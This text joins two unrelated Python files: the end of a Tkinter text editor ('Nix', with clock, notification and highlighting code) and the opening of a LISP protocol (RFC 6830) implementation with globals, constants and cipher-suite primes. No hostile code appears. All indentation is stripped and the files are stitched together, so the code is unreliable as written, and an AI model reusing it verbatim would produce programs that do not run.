if (self.focus_get() == self.buffer): self.buffer.focus_set()
elif (self.focus_get() == self.find_entry): pass
else:
self.command_out.focus_set()
if (append_history and arg): self.command_out.append_history(arg)
self.command_out.stdout(arg=arg, tags=tags, justify=justify)
lines = len(self.command_out.arg.split("\n"))
font_size = (self.command_out.font.metrics("linespace")+self.command_out.cget("spacing3"))
if (lines < 10):
h = font_size*lines
else:
h = font_size*((self.winfo_height()//2)/font_size)
# y = self.buffer_frame.winfo_height()
# if (self.command_out["relief"] == "flat"): x = self.buffer["bd"]; w = self.buffer["bd"]; y -= self.buffer["bd"]
# else: x = 0; w = 0; h += (self.command_out["bd"])
if (self.command_out["relief"] != "flat"): h += (self.command_out["bd"])
x = 0; w = 0;
self.command_out.tkraise()
if (self.conf["orientate"] == "down"): self.command_out.place(x=x, y=self.buffer_frame.winfo_height(), width=self.buffer_frame.winfo_width()-w*2, height=h, anchor="sw")
elif (self.conf["orientate"] == "up"): self.command_out.place(x=x, y=0, width=self.buffer_frame.winfo_width()-w*2, height=h, anchor="nw")
return "break"
def notify(self, arg=None, tags=None, justify="left"):
# one hack after another
self.command_out["state"] = "normal"
self.command_out_set(arg=arg, tags=tags, focus=True, justify=justify, append_history=False)
if (not self.conf["allow_notifications"]): self.command_out.unplace() # HACK
self.command_out["state"] = "disabled"
def error(self, arg=None, tags=None, justify="left"):
tags = [["1.0", "1.6", "error"], tags] if tags else [["1.0", "1.6", "error"]]
self.notify("Error: "+arg, tags, justify)
def show_last_output(self, arg=None):
self.command_out_set(arg=None, tags=None)
return "break"
def cmmand(self, arg):
# gets input from the command_entry widget, checks if there's any actual input or if it's an empty string
# if it's not an empty string it sends it to the parser class and if it's a valid command defined in the "commands" dictionary
# and if it's defined it runs the function related to that name
""" """
command = self.command_entry.get("1.0", "end-1c").split() #turns command into a list of arguments
in_quote = False
delimeter_start = 0
for i in range(len(command)): # wonky path correction
if (re.search(r"\\", command[i])):
command[i] = command[i].replace("\\", " ")
elif (len(re.findall(r"\"|'", command[i])) % 2 != 0):
in_quote = not in_quote
if (in_quote): delimeter_start = i
else:
sub = command[delimeter_start:i+1]
del command[delimeter_start:i+1]
command.insert(delimeter_start, " ".join(sub))
command[delimeter_start] = command[delimeter_start].strip("\"'")
if (not command): self.command_entry.unplace(); return #if no input/argument were provided hide the command entry widget and break function
if (command != self.command_entry.input_history[-1]): self.command_entry.input_history.append(command)
self.parser.parse_argument(command)
#sets focus back to text widget
self.buffer.see("insert")
self.command_entry.delete("1.0", "end") #deletes command line input
#set command history to newest index
self.command_entry.input_history_index = 0
self.command_entry.unplace()
def buffer_unplace(self, arg=None):
""" I have no idea why this is a separate function """
try:
for buffer in self.buffer_render_list:
buffer.unplace()
except Exception: pass
def unplace_all_except_buffer(self, arg=None):
self.command_entry.unplace()
self.find_entry.unplace()
self.command_out.unplace()
def get_rand_temperature(self):
""" generates a random temperature depending on the current month """
month = datetime.datetime.now().date().month
temperature = 0
if (month == 12 or month <= 2):
temperature = random.randint(-17, 14)
elif (month > 2 and month <= 5):
temperature = random.randint(14, 28)
elif (month > 5 and month <= 8):
temperature = random.randint(20, 35)
elif (month > 8 and month <= 11):
temperature = random.randint(3, 20)
return f"{temperature}°C"
def get_temperature(self):
self.temperature_label.configure(text=self.get_rand_temperature())
# """ scrapes the current temperature of Stockholm """
# def temp():
# try:
# url = "https://www.bbc.com/weather/2673730" #link to Stockholm's weather data
# html = requests.get(url).content #gets the html of the url
# x = "("+BeautifulSoup(html, features="html.parser").find("span", class_="wr-value--temperature--c").text+"C)" # looks for the temperature value and puts it in a string "([value and degree sign]C)"
# self.temperature_label.configure(text=x)
# except Exception: #dunno if it won't crash the app if there's no internet connection
# self.temperature_label.configure(text=self.get_rand_temperature())
# threading.Thread(target=temp, daemon=True).start()
def get_time(self):
""" gets time and parses to make it look the way I want it to """
# d_time = datetime.datetime.now().time()
# curr_time = time.localtime()
time = datetime.datetime.now(self.conf["timezone"])
d_time = time.strftime("%H:%M:%S")
if (self.time_label_value.get().split(":")[2] == time.second): return # checks if it's still the same second as the last time the function was executed, not very efficient, but still more efficient than running a bunch of string formatting every few miliseconds
if (time.minute == "00" and time.second == "10"): #checks if it's time for updating the temperature
self.get_temperature()
self.time_label_value.set(d_time)# return time #updates the time label/widget to show current time
def get_abs_percentage_pos(self):
return math.ceil(self.buffer.current_char_abs_pos*100/self.buffer.total_chars) # m(a)eth
def get_line_relative_percentage_pos(self):
return math.ceil(int(self.buffer.cursor_index[0])*100/self.buffer.total_lines) # this gotta be slow as shit
def update_index(self, arg=None):
# called upon every keypress
if (self.buffer.index("insert") == self.buffer.sel_start): self.buffer.sel_start = None
self.buffer.cursor_index = self.buffer.index("insert").split(".") # gets the cursor's position and makes it into a list [line, column]
self.buffer.current_char_abs_pos = len(self.buffer.get("1.0", "insert"))
# p = self.get_line_relative_percentage_pos()
# p = self.get_abs_percentage_pos()
p = self.conf["percentage_pos_func"]()
self.line_no.configure(text=f"[{self.buffer.index('insert')}] {p}%") #updates the line&column widget to show current cursor index/position
if (self.buffer.sel_start): # show selection index on the top of the window if a selection is active
self.line_no.configure(text=f"[{self.buffer.index('sel.first')}][{self.buffer.index('sel.last')}] {p}%")
self.buffer.highlighter.bracket_pair_make(self.buffer.get("insert")) # highlights matching brackets
self.buffer.current_line = self.buffer.get(f"insert linestart", f"insert lineend+1c") #+1c so the line includes the newline character
self.buffer.current_token = self.buffer.get("insert wordstart", "insert wordend")
if (re.match(r"^\s+", self.buffer.current_token) and len(self.buffer.current_token) <= 1):
# if (len(self.buffer.current_token) < 1):
# self.buffer.current_token = self.buffer.get("insert -1c wordstart", "insert -1c wordend")
self.buffer.current_token = self.buffer.get("insert wordstart -1c wordstart", "insert wordstart -1c wordend")
# self.buffer.current_token = self.buffer.current_token.strip("\n")
# elif (re.match(r"(.)+\s+$", self.buffer.current_token) and len(self.buffer.current_token) <= 1):
# self.buffer.current_token = self.buffer.get("insert wordstart -1c wordstart", "insert wordstart -1c")
# self.buffer.current_token = self.buffer.current_token.strip("\n")
elif (self.buffer.current_token[0] == "\n"):
self.buffer.current_token = self.buffer.get("insert wordstart +1c", "insert wordend")
# elif (self.buffer.current_token == "\n"):
# self.buffer.current_token = self.buffer.get("insert wordstart -1c wordstart", "insert wordstart -1c wordend")
# if (len(self.buffer.current_token) <= 1): self.buffer.current_token = ""
# print("token: ", self.buffer.current_token, self.buffer.index("insert wordstart"), self.buffer.index("insert wordend"))
if (self.conf["highlight_line"]): self.buffer.tag_remove("whitespace_bg", "1.0", "end"); self.buffer.tag_add("whitespace_bg", "insert linestart", "insert lineend")
self.buffer.see("insert")
# mark_name = self.buffer.mark_names()[-1]
# if (mark_name[:2] == "tk"):
# coords = self.buffer.bbox(mark_name)
# print(coords)
# custom cursor thingy
# coords = self.buffer.bbox("insert")
# a = tkinter.Label(self.buffer)
# a.place(x=coords[0], y=coords[1]-2, w=1, h=self.buffer.font.metrics("linespace"))
# self.curs.place(x=coords[0]-2, y=coords[1]-2, w=1, h=self.buffer.font.metrics("linespace"))
# self.curs.place(x=coords[0]-2, y=coords[1]+self.buffer.font.metrics("linespace")-2, w=self.buffer.font_size-3, h=1)
# threading.Thread(target=t, args=(self.buffer.cursor_index[0],), deamon=True).start()
# self.l.see(float(self.buffer.cursor_index[0])+20)
if (arg): return "break"
def update_buffer(self, arg=None):
""" updates some of the widgets when a key is released """
# called upon every keyrelease
if (arg): # shows the characters that were released (eg. Control: D), but it can't handle more than one character (eg. Control: b-w)
# print(chr(arg.state), chr(arg.keysym_num))
if (re.match("Control|Alt|Shift", arg.keysym)): return # ignore keyrelease of Control Alt Shift etc.
# text = re.sub("\|*Mod2", "", re.search("state=[a-zA-Z0-9\|]+", f"{arg}").group()[6:]) # magic with regex to show the keys you pressed in a nicer format
# if (text): self.key_label["text"] = f"[{arg.state}: {arg.keysym}]"
# else: self.key_label["text"] = f"[{arg.keysym}]"
# self.key_label["text"] = f"[{arg.state}|{arg.keysym}]"
self.key_label["text"] = f"[{arg.state}|{arg.keysym}]"
if (arg.keysym in ("Up", "Down", "Left", "Right")): return # ends function if it was triggered by arrow keys (as they have different functions to handle them)
self.update_index()
# if (self.buffer.total_chars != len(self.buffer.get("1.0", "end"))): # checks if any changes have been made to the text
if (self.buffer.edit_modified()):
self.buffer.state_set(add="*")
if (self.buffer.type != "temp" and self.buffer.file_start_time != os.stat(self.buffer.full_name).st_mtime):
self.buffer.state_set(add="!")
else:
self.buffer.state_set(pop="!")
self.buffer.total_chars = self.buffer.current_char_abs_pos+len(self.buffer.get("insert", "end"))
# self.buffer.lexer.lex() # lex text for variables, functions, structures and class etc.
self.buffer.typing_index_set() # Alt-Shift-M: sets your cursor to the position you were last typing in
self.buffer.highlighter.highlight(self.buffer.cursor_index[0], self.buffer.current_line) # highlight current line
# if the following widgets are not focused they are hidden
if (self.focus_displayof() != self.command_entry):
self.command_entry.place_forget()
if (self.focus_displayof() != self.command_out):
self.command_out.place_forget()
if (self.conf["suggest"]): self.buffer.highlighter.suggest(self.buffer.cursor_index[0], self.buffer.current_line)
self.update_win()
def update_win(self):
""" updates the window whole window (all of it's widgets) """
self.update()
self.update_idletasks()
def main(self):
""" reconfigures(updates) some of the widgets to have specific values and highlights the current_line"""
self.buffer.focus_set()
t0 = time.time(); self.c = 0
counter = 0
def a(counter=0): # some annoying notifications
while (self.run):
time.sleep(1)
self.get_time()
counter += 1
if (counter == 1650):
self.notify("POSTURE CHECK! You've been programming for half an hour now. Consider stretching for a bit")
elif (counter == 3600):
self.notify("You've been programming for an hour now. Consider taking a break")
counter = 0
# time.sleep(1650)
# try:
# self.notify("POSTURE CHECK! You've been programming for half an hour now. Consider stretching for a bit")
# notify2.init("Nix")
# notify2.Notification("POSTURE CHECK", "You've been programming for half an hour now. Consider stretching for a bit").show()
# except Exception:
# self.commmand_out_set("Consider downloading the notify2 module"); return
# time.sleep(1650)
# try:
# self.notify("You've been programming for an hour now. Consider taking a break")
# notify2.init("Nix")
# notify2.Notification("BREAK TIME", "You've been programming for an hour now. Consider taking a break").show()
# except Exception:
# self.commmand_out_set("Consider downloading the notify2 module"); return
# a()
# self.after(0, self.get_time())
# def b():
# while (self.run):
# time.sleep(1)
# self.get_time()
# self.fps_label.configure(text=f"<{round(self.c/1000, 2)}KHz>")
# self.c = 0
threading.Thread(target=a, daemon=True).start()
# threading.Thread(target=b, daemon=True).start()
# while (self.run):
# self.update_win()
# self.get_time()
# if (int(time.time()-t0) >= 1): # updates the processor frequency value every second
# def a():
# self.fps_label.configure(text=f"<{round(psutil.cpu_freq().current/100*psutil.cpu_percent(), 2)}MHz> <{psutil.sensors_temperatures()['coretemp'][0].current}>")
# threading.Thread(target=a, daemon=True).start()
# t0 = time.time()
def highlight_chunk(self, arg=None, start_index=None, stop_index=None):
for buffer in self.buffer_render_list:
if (not start_index): start_index = 1
if (not stop_index): stop_index = buffer.get_line_count()
buffer.convert_line_index("int", start_index)
buffer.convert_line_index("int", stop_index)
def highlight(text):
for i in range(start_index, stop_index+1):
text.highlighter.highlight(i)
text.highlighter.lex_line(i)
threading.Thread(target=highlight, args=(buffer, ), daemon=True).start()
def unhighlight_chunk(self, arg=None, start_index=None, stop_index=None):
for buffer in self.buffer_render_list:
if (not start_index): start_index = 1
if (not stop_index): stop_index = buffer.get_line_count()
buffer.convert_line_index("int", start_index)
buffer.convert_line_index("int", stop_index)
def unhighlight():
[buffer.highlighter.unhighlight(i) for i in range(start_index, stop_index+1)]
threading.Thread(target=unhighlight, args=(buffer, ), daemon=True).start()
if __name__ == "__main__":
win = WIN()
win.after(0, win.main)
win.mainloop()
print("thank you for using Nix")
|
lisp.py | # -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp.py
#
# This file contains all constants, definitions, data structures, packet
# send and receive functions for the LISP protocol according to RFC 6830.
#
#------------------------------------------------------------------------------
from __future__ import print_function
from __future__ import division
from future import standard_library
standard_library.install_aliases()
from builtins import hex
from builtins import str
from builtins import int
from builtins import range
from builtins import object
from past.utils import old_div
import socket
import time
import struct
import binascii
import hmac
import hashlib
import datetime
import os
import sys
import random
import threading
import operator
import netifaces
import platform
import traceback
from Crypto.Cipher import AES
import ecdsa
import json
import copy
import chacha
import poly1305
import geopy
import curve25519
from subprocess import getoutput
import queue
import distro
import pprint
#
# For printing the lisp_rloc_probe_list{}.
#
lisp_print_rloc_probe_list = False
#------------------------------------------------------------------------------
#
# Global variables.
#
lisp_hostname = ""
lisp_version = ""
lisp_uptime = ""
lisp_i_am_core = False
lisp_i_am_itr = False
lisp_i_am_etr = False
lisp_i_am_rtr = False
lisp_i_am_mr = False
lisp_i_am_ms = False
lisp_i_am_ddt = False
lisp_log_id = ""
lisp_debug_logging = True
lisp_map_notify_queue = {} # Key is concat of nonce and etr address
lisp_map_servers_list = {} # Key is ms-name/address string, value lisp_ms()
lisp_ddt_map_requestQ = {}
lisp_db_list = [] # Elements are class lisp_mapping()
lisp_group_mapping_list = {} # Elements are class lisp_group_mapping()
lisp_map_resolvers_list = {} # Key is mr-name/address string, value lisp_mr()
lisp_rtr_list = {} # Key is address string, value is lisp_address()
lisp_elp_list = {}
lisp_rle_list = {}
lisp_geo_list = {}
lisp_json_list = {}
lisp_myrlocs = [None, None, None]
lisp_mymacs = {}
#
# Used for multi-tenancy. First dictionary array is indexed by device name
# and second one has value lisp_interface() indexed by a instance-id string.
#
lisp_myinterfaces = {}
lisp_iid_to_interface = {}
lisp_multi_tenant_interfaces = []
lisp_test_mr_timer = None
lisp_rloc_probe_timer = None
#
# Stats variables.
#
lisp_registered_count = 0
#
# For tracking Map-Requesters behind NAT devices.
#
lisp_info_sources_by_address = {}
lisp_info_sources_by_nonce = {}
#
# Store computed keys per RLOC. The key is the nonce from the Map-Request
# at the time creates the g, p, and public-key values. The value is an
# array of 4 elements, indexed by key-id.
#
lisp_crypto_keys_by_nonce = {}
lisp_crypto_keys_by_rloc_encap = {} # Key is "<rloc>:<port>" tuple
lisp_crypto_keys_by_rloc_decap = {} # Key is "<rloc>:<port>" tuple
lisp_data_plane_security = False
lisp_search_decap_keys = True
lisp_data_plane_logging = False
lisp_frame_logging = False
lisp_flow_logging = False
#
# When NAT-traversal is enabled and lisp-crypto is enabled, an ITR needs
# to send RLOC-probe requests with an ephemeral port that is also used
# for data encapsulation to the RTR. This way the RTR can find the crypto
# key when multiple xTRs are behind the same NAT.
#
lisp_crypto_ephem_port = None
#
# Is the lisp-itr process running as a PITR?
#
lisp_pitr = False
#
# Are we listening on all MAC frames?
#
lisp_l2_overlay = False
#
# RLOC-probing variables. And for NAT-traversal, register only reachable
# RTRs which is determined from the lisp_rloc_probe_list.
#
lisp_rloc_probing = False
lisp_rloc_probe_list = {}
#
# Command "lisp xtr-parameters" register-reachabile-rtrs has opposite polarity
# to lisp_register_all_rtrs. So by default we do not consider RLOC-probing
# reachability status in registering RTRs to the mapping system.
#
lisp_register_all_rtrs = True
#
# Nonce Echo variables.
#
lisp_nonce_echoing = False
lisp_nonce_echo_list = {}
#
# xTR configuration parameters.
#
lisp_nat_traversal = False
#
# xTR configuration parameters. This flag is used to indicate that when a
# map-cache entry is created or updated, that we write specific information
# to say a Broadcom chip, that will do VXLAN encapsulation. This is a way
# to get existing hardware to do L3 overlays with the LISP control-plane
# when all it supports is VXLAN. See lisp_program_vxlan_hardware()
#
lisp_program_hardware = False
#
# Should we write to the lisp.checkpoint file.
#
lisp_checkpoint_map_cache = False
lisp_checkpoint_filename = "./lisp.checkpoint"
#
# Should we write map-cache entries to a named socket for another data-plane?
#
lisp_ipc_data_plane = False
lisp_ipc_dp_socket = None
lisp_ipc_dp_socket_name = "lisp-ipc-data-plane"
#
# This lock is used so the lisp-core process doesn't intermix command
# processing data with show data and packet data.
#
lisp_ipc_lock = None
#
# Use this as a default instance-ID when there are no "lisp interface" commands
# configured. This default instance-ID is taken from the first database-mapping
# command.
#
lisp_default_iid = 0
lisp_default_secondary_iid = 0
#
# Configured list of RTRs that the lisp-core process will insert into
# Info-Reply messages.
#
lisp_ms_rtr_list = [] # Array of type lisp.lisp_address()
#
# Used in an RTR to store a translated port for a translated RLOC. Key is
# hostname that is sent in a Info-Request is a nested array. See
# lisp_store_nat_info() for details.
#
lisp_nat_state_info = {}
#
# Used for doing global rate-limiting of Map-Requests. When the process
# starts up or the map-cache is cleared by user we don't do rate-limiting for
# 1 minute so we can load up the cache quicker.
#
lisp_last_map_request_sent = None
lisp_no_map_request_rate_limit = time.time()
#
# Used for doing global rate-limiting of ICMP Too Big messages.
#
lisp_last_icmp_too_big_sent = 0
#
# Array to store 1000 flows.
#
LISP_FLOW_LOG_SIZE = 100
lisp_flow_log = []
#
# Store configured or API added policy parameters.
#
lisp_policies = {}
#
# Load-split pings. We'll has the first long of a ICMP echo-request and
# echo-reply for testing purposes. To show per packet load-splitting.
#
lisp_load_split_pings = False
#
# This array is a configured list of IPv6-prefixes that define what part
# of a matching address is used as the crypto-hash. They must be on 4-bit
# boundaries for easy matching.
#
lisp_eid_hashes = []
#
# IPv4 reassembly buffer. We pcapture IPv4 fragments. They can come to the ETR
# when IPv6 is encapsulated in IPv4 and we have an MTU violation for the
# encapsulated packet. The array is index by the IPv4 ident field and contains
# an array of packet buffers. Once all fragments have arrived, the IP header
# is removed from all fragments except the first one.
#
lisp_reassembly_queue = {}
#
# Map-Server pubsub cache. Remember Map-Requesters that set the N-bit for
# a EID target it is requesting. Key is EID-prefix in string format with
# bracketed instance-ID included in slash format. The value of the dictionary
# array is a dictionary array of ITR addresses in string format.
#
lisp_pubsub_cache = {}
#
# When "decentralized-push-xtr = yes" is configured, the xTR is also running as
# a Map-Server and Map-Resolver. So Map-Register messages the ETR sends is
# looped back to the lisp-ms process.
#
lisp_decent_push_configured = False
#
# When "decentralized-pull-xtr-[modulus,dns-suffix] is configured, the xTR is
# also running as a Map-Server and Map-Resolver. So Map-Register messages the
# ETR sends is looped back to the lisp-ms process.
#
lisp_decent_modulus = 0
lisp_decent_dns_suffix = None
#
# lisp.lisp_ipc_socket is used by the lisp-itr process during RLOC-probing
# to send the lisp-etr process status about RTRs learned. This is part of
# NAT-traversal support.
#
lisp_ipc_socket = None
#
# Configured in the "lisp encryption-keys" command.
#
lisp_ms_encryption_keys = {}
lisp_ms_json_keys = {}
#
# Used to stare NAT translated address state in an RTR when a ltr client
# is sending RLOC-based LISP-Trace messages. If the RTR encounters any
# LISP-Trace error proessing called from lisp_rtr_data_plane() then it
# can return a partially filled LISP-Trace packet to the ltr client that
# site behind a NAT device.
#
# Dictiionary array format is:
# key = self.local_addr + ":" + self.local_port
# lisp_rtr_nat_trace_cache[key] = (translated_rloc, translated_port)
#
# And the array elements are added in lisp_trace.rtr_cache_nat_trace().
#
lisp_rtr_nat_trace_cache = {}
#
# Configured glean mappings. The data structure is an array of dictionary
# arrays with keywords "eid-prefix", "group-prefix", "rloc-prefix", and
# "instance-id". If keywords are not in dictionary array, the value is
# wildcarded. The values eid-prefix, group-prefix and rloc-prefix is
# lisp_address() so longest match lookups can be performed. The instance-id
# value is an array of 2 elements that store same value in both elements if
# not a range or the low and high range values.
#
lisp_glean_mappings = []
#
# Gleaned groups data structure. Used to find all (S,G) and (*,G) the gleaned
# EID has joined. This data structure will be used to time out entries that
# have stopped joining. In which case, the RLE is removed from the (S,G) or
# (*,G) that join timed out.
#
# The dictionary array is indexed by "[<iid>]<eid>" and the value field is a
# dictoinary array indexed by group address string. The value of the nested
# dictionay array is a timestamp. When EID 1.1.1.1 has joined groups 224.1.1.1,
# and 224.2.2.2, here is how timestamp 1111 and 2222 are stored.
#
# >>> lisp_gleaned_groups = {}
# >>> lisp_gleaned_groups["[1539]1.1.1.1"] = {}
# >>> lisp_gleaned_groups["[1539]1.1.1.1"]["224.1.1.1"] = 1111
# >>> lisp_gleaned_groups["[1539]1.1.1.1"]["224.2.2.2"] = 2222
# >>> lisp_gleaned_groups
# {'[1539]1.1.1.1': {'224.2.2.2': 2222, '224.1.1.1': 1111}}
#
lisp_gleaned_groups = {}
#
# Use this socket for all ICMP Too-Big messages sent by any process. We are
# centralizing it here.
#
lisp_icmp_raw_socket = None
if (os.getenv("LISP_SEND_ICMP_TOO_BIG") != None):
lisp_icmp_raw_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW,
socket.IPPROTO_ICMP)
lisp_icmp_raw_socket.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
#endif
lisp_ignore_df_bit = (os.getenv("LISP_IGNORE_DF_BIT") != None)
#------------------------------------------------------------------------------
#
# UDP ports used by LISP.
#
LISP_DATA_PORT = 4341
LISP_CTRL_PORT = 4342
LISP_L2_DATA_PORT = 8472
LISP_VXLAN_DATA_PORT = 4789
LISP_VXLAN_GPE_PORT = 4790
LISP_TRACE_PORT = 2434
#
# Packet type definitions.
#
LISP_MAP_REQUEST = 1
LISP_MAP_REPLY = 2
LISP_MAP_REGISTER = 3
LISP_MAP_NOTIFY = 4
LISP_MAP_NOTIFY_ACK = 5
LISP_MAP_REFERRAL = 6
LISP_NAT_INFO = 7
LISP_ECM = 8
LISP_TRACE = 9
#
# Map-Reply action values.
#
LISP_NO_ACTION = 0
LISP_NATIVE_FORWARD_ACTION = 1
LISP_SEND_MAP_REQUEST_ACTION = 2
LISP_DROP_ACTION = 3
LISP_POLICY_DENIED_ACTION = 4
LISP_AUTH_FAILURE_ACTION = 5
LISP_SEND_PUBSUB_ACTION = 6
lisp_map_reply_action_string = ["no-action", "native-forward",
"send-map-request", "drop-action", "policy-denied",
"auth-failure", "send-subscribe"]
#
# Various HMACs alg-ids and lengths (in bytes) used by LISP.
#
LISP_NONE_ALG_ID = 0
LISP_SHA_1_96_ALG_ID = 1
LISP_SHA_256_128_ALG_ID = 2
LISP_MD5_AUTH_DATA_LEN = 16
LISP_SHA1_160_AUTH_DATA_LEN = 20
LISP_SHA2_256_AUTH_DATA_LEN = 32
#
# LCAF types as defined in draft-ietf-lisp-lcaf.
#
LISP_LCAF_NULL_TYPE = 0
LISP_LCAF_AFI_LIST_TYPE = 1
LISP_LCAF_INSTANCE_ID_TYPE = 2
LISP_LCAF_ASN_TYPE = 3
LISP_LCAF_APP_DATA_TYPE = 4
LISP_LCAF_GEO_COORD_TYPE = 5
LISP_LCAF_OPAQUE_TYPE = 6
LISP_LCAF_NAT_TYPE = 7
LISP_LCAF_NONCE_LOC_TYPE = 8
LISP_LCAF_MCAST_INFO_TYPE = 9
LISP_LCAF_ELP_TYPE = 10
LISP_LCAF_SECURITY_TYPE = 11
LISP_LCAF_SOURCE_DEST_TYPE = 12
LISP_LCAF_RLE_TYPE = 13
LISP_LCAF_JSON_TYPE = 14
LISP_LCAF_KV_TYPE = 15
LISP_LCAF_ENCAP_TYPE = 16
#
# TTL constant definitions.
#
LISP_MR_TTL = (24*60)
LISP_REGISTER_TTL = 3
LISP_SHORT_TTL = 1
LISP_NMR_TTL = 15
LISP_GLEAN_TTL = 15
LISP_MCAST_TTL = 15
LISP_IGMP_TTL = 240
LISP_SITE_TIMEOUT_CHECK_INTERVAL = 60 # In units of seconds, 1 minute
LISP_PUBSUB_TIMEOUT_CHECK_INTERVAL = 60 # In units of seconds, 1 minute
LISP_REFERRAL_TIMEOUT_CHECK_INTERVAL = 60 # In units of seconds, 1 minute
LISP_TEST_MR_INTERVAL = 60 # In units of seconds, 1 minute
LISP_MAP_NOTIFY_INTERVAL = 2 # In units of seconds
LISP_DDT_MAP_REQUEST_INTERVAL = 2 # In units of seconds
LISP_MAX_MAP_NOTIFY_RETRIES = 3
LISP_INFO_INTERVAL = 15 # In units of seconds
LISP_MAP_REQUEST_RATE_LIMIT = .5 # In units of seconds, 500 ms
LISP_NO_MAP_REQUEST_RATE_LIMIT_TIME = 60 # In units of seconds, 1 minute
LISP_ICMP_TOO_BIG_RATE_LIMIT = 1 # In units of seconds
LISP_RLOC_PROBE_TTL = 128
LISP_RLOC_PROBE_INTERVAL = 10 # In units of seconds
LISP_RLOC_PROBE_REPLY_WAIT = 15 # In units of seconds
LISP_DEFAULT_DYN_EID_TIMEOUT = 15 # In units of seconds
LISP_NONCE_ECHO_INTERVAL = 10
LISP_IGMP_TIMEOUT_INTERVAL = 180 # In units of seconds, 3 minutes
#
# Cipher Suites defined in RFC 8061:
#
# Cipher Suite 0:
# Reserved
#
# Cipher Suite 1 (LISP_2048MODP_AES128_CBC_SHA256):
# Diffie-Hellman Group: 2048-bit MODP [RFC3526]
# Encryption: AES with 128-bit keys in CBC mode [AES-CBC]
# Integrity: Integrated with AEAD_AES_128_CBC_HMAC_SHA_256 [AES-CBC]
# IV length: 16 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 2 (LISP_EC25519_AES128_CBC_SHA256):
# Diffie-Hellman Group: 256-bit Elliptic-Curve 25519 [CURVE25519]
# Encryption: AES with 128-bit keys in CBC mode [AES-CBC]
# Integrity: Integrated with AEAD_AES_128_CBC_HMAC_SHA_256 [AES-CBC]
# IV length: 16 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 3 (LISP_2048MODP_AES128_GCM):
# Diffie-Hellman Group: 2048-bit MODP [RFC3526]
# Encryption: AES with 128-bit keys in GCM mode [RFC5116]
# Integrity: Integrated with AEAD_AES_128_GCM [RFC5116]
# IV length: 12 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 4 (LISP_3072MODP_AES128_GCM):
# Diffie-Hellman Group: 3072-bit MODP [RFC3526]
# Encryption: AES with 128-bit keys in GCM mode [RFC5116]
# Integrity: Integrated with AEAD_AES_128_GCM [RFC5116]
# IV length: 12 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 5 (LISP_256_EC25519_AES128_GCM):
# Diffie-Hellman Group: 256-bit Elliptic-Curve 25519 [CURVE25519]
# Encryption: AES with 128-bit keys in GCM mode [RFC5116]
# Integrity: Integrated with AEAD_AES_128_GCM [RFC5116]
# IV length: 12 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 6 (LISP_256_EC25519_CHACHA20_POLY1305):
# Diffie-Hellman Group: 256-bit Elliptic-Curve 25519 [CURVE25519]
# Encryption: Chacha20-Poly1305 [CHACHA-POLY] [RFC7539]
# Integrity: Integrated with AEAD_CHACHA20_POLY1305 [CHACHA-POLY]
# IV length: 8 bytes
# KDF: HMAC-SHA-256
#
LISP_CS_1024 = 0
LISP_CS_1024_G = 2
LISP_CS_1024_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
LISP_CS_2048_CBC = 1
LISP_CS_2048_CBC_G = 2
LISP_CS_2048_CBC_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
LISP_CS_25519_CBC = 2
LISP_CS_2048_GCM = 3
LISP_CS_3072 = 4
LISP_CS_3072_G = 2
LISP_CS_3072_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A93AD2CAFFFFFFFFFFFFFFFF
LISP_CS_25519_GCM = 5
LISP_CS_25519_CHACHA = 6
LISP_4_32_MASK = 0xFFFFFFFF
LISP_8_64_MASK = 0xFFFFFFFFFFFFFFFF
LISP_16_128_MASK = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
use_chacha = (os.getenv("LISP_USE_CHACHA") != None)
use_poly = (os.getenv("LISP_USE_POLY") != None)
#------------------------------------------------------------------------------
#
# lisp_record_traceback
#
# Open ./logs/lisp-traceback.log file and write traceback info to it.
#
def lisp_record_traceback(*args):
ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")[:-3]
fd = open("./logs/lisp-traceback.log", "a")
fd.write("---------- Exception occurred: {} ----------\n".format(ts))
try:
traceback.print_last(file=fd)
except:
